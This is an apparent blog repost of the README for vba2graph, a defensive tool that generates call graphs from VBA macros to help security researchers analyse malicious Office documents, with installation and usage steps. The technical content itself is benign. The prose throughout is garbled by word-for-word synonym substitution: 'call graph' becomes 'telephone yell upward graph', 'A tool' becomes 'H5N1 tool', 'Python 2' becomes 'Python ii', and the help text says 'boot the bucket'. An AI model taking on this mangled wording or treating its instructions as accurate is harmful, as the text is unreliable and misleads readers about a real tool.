Home Unlabelled Vba2graph - Generate Telephone Telephone Graphs From Vba Code, For Easier Analysis Of Malicious Documents

Vba2graph - Generate Telephone Telephone Graphs From Vba Code, For Easier Analysis Of Malicious Documents

By
Tuesday, September 24, 2019
Read
Add Comment
H5N1 tool for safety researchers, who waste product their fourth dimension analyzing malicious Office macros.
Generates a VBA telephone yell upward graph, alongside potential malicious keywords highlighted.
Allows for quick analysis of malicous macros, in addition to slowly agreement of the execution flow.

Features
  • Keyword highlighting
  • VBA Properties support
  • External business office declarion support
  • Tricky macros alongside "_Change" execution triggers
  • Fancy color schemes!

Pros
  • Pretty fast
  • Works good on nearly malicious macros observed inwards the wild


Cons
  • Static (dynamicaly resolved calls would non survive recognized)


Examples
Example 1:
Trickbot downloader - utilizes object Resize number every bit initial trigger, followed yesteryear TextBox_Change triggers.


Example 2:


Check out the Examples folder for to a greater extent than cases.

Installation

Install oletools:
https://github.com/decalage2/oletools/wiki/Install

Install Python Requirements
pip2 install -r requirements.txt

Install Graphviz

Windows
Install Graphviz msi:
https://graphviz.gitlab.io/_pages/Download/Download_windows.html
Add "dot.exe" to PATH env variable or just:
set PATH=%PATH%;C:\Program Files (x86)\Graphviz2.38\bin

Mac
brew install graphviz

Ubuntu
sudo apt-get install graphviz

Arch
sudo pacman -S graphviz

Usage
usage: vba2graph.py [-h] [-o OUTPUT] [-c {0,1,2,3}] (-i INPUT | -f FILE)  optional arguments:   -h, --help            demo this attention message in addition to boot the bucket   -o OUTPUT, --output OUTPUT                         output folder (default: "output")   -c {0,1,2,3}, --colors {0,1,2,3}                         color system number [0, 1, 2, 3] (default: 0 - B&W)   -i INPUT, --input INPUT                         olevba generated file or .bas file   -f FILE, --file FILE  Office file alongside macros

Usage Examples (All Platforms)
Only Python ii is supported:
# Generate telephone yell upward graph straight from an Office file alongside macros [tnx @doomedraven] python2 vba2graph.py -f malicious.doc -c ii      # Generate vba code using olevba hence piping it to vba2graph olevba malicious.doc | python2 vba2graph.py -c 1  # Generate telephone yell upward graph from VBA code python2 vba2graph.py -i vba_code.bas -o output_folder

Output
You'll become iv folders inwards your output folder:
  • png: the actual graph icon yous are looking for
  • svg: same graph image, simply inwards vector graphics
  • dot: the point file which was used to exercise the graph image
  • bas: the VBA functions code that was recognized yesteryear the script (for debugging)

Batch Processing

Mac/Linux:
batch.sh script file is attached for running olevba in addition to vba2graph on an input folder of malicious docs.
Deletes output dir. job alongside caution.


Tags :

Created By Nexus · Powered by Blogger
© All Rights Reserved

Terms Of Service · Privacy Policy · Disclaimer · Contact Us · About Us